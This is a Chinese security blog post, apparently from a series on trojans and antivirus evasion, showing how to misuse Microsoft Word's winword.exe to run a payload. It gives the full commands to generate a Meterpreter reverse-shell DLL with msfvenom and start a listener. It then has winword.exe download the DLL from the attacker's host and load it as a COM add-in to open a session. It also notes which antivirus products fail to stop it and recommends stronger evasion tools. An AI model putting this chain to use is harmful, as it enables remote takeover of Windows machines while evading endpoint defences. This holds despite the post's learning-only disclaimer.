远控免杀专题(50)-白名单winword.exe执行payload

admin 2022年7月13日21:57:39评论73 views字数 1503阅读5分0秒阅读模式
远控免杀专题(50)-白名单winword.exe执行payload

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!



声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus

一、winword简介

winword.exe是微软Microsoft Word的主程序。该字处理程序是微软Microsoft Office组件的一部分。

二、通过winword.exe执行payload

msfvenom生成木马:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 -f dll > /var/www/html/shell.dll

设置监听:

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.19.146set lport 23333exploit

winword.exe下载payload:

winword.exe "http://192.168.19.146/shell.dll"

在未开启杀毒软件的情况下,winword.exe未对远程文件做校验直接下载到本地,下载的文件位置:

C:UsersusernameAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5

远控免杀专题(50)-白名单winword.exe执行payload

在开启杀毒软件的情况下执行该下载命令时会被拦截,下载的dll文件也会被删除:

远控免杀专题(50)-白名单winword.exe执行payload

远控免杀专题(50)-白名单winword.exe执行payload

winword.exe客户端会以只读的形式乱码显示文件内容:

远控免杀专题(50)-白名单winword.exe执行payload

通过winword.exe加载dll文件,步骤如下:

文件-->选项-->添加com加载项-->到下载的dll文件位置添加dll文件

远控免杀专题(50)-白名单winword.exe执行payload

远控免杀专题(50)-白名单winword.exe执行payload

添加成功后顺利建立会话:

远控免杀专题(50)-白名单winword.exe执行payload

当火绒和360处于开启的情况下,添加木马dll会报警,但会话依旧会建立:

远控免杀专题(50)-白名单winword.exe执行payload

远控免杀专题(50)-白名单winword.exe执行payload

三、总结

  1. 使用msfvenom生成的木马在下载时就会被查杀,建议使用免杀效果更好的工具生成木马。

  2. winword.exe在加载木马时调用rundll32.exe程序,所以只能使用32位dll。

  3. 下载的木马文件即使关闭office程序后也不会被删除。

  4. vt免杀结果感人:

远控免杀专题(50)-白名单winword.exe执行payload

四、参考资料

lolbas-winword:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/

通过微软office下载和执行payload:https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191




E


N


D




远控免杀专题(50)-白名单winword.exe执行payload


guān


zhù



men



Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

远控免杀专题(50)-白名单winword.exe执行payload


远控免杀专题(50)-白名单winword.exe执行payload


原文始发于微信公众号(白帽子):远控免杀专题(50)-白名单winword.exe执行payload

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月13日21:57:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   远控免杀专题(50)-白名单winword.exe执行payloadhttp://cn-sec.com/archives/1174038.html

发表评论

匿名网友 填写信息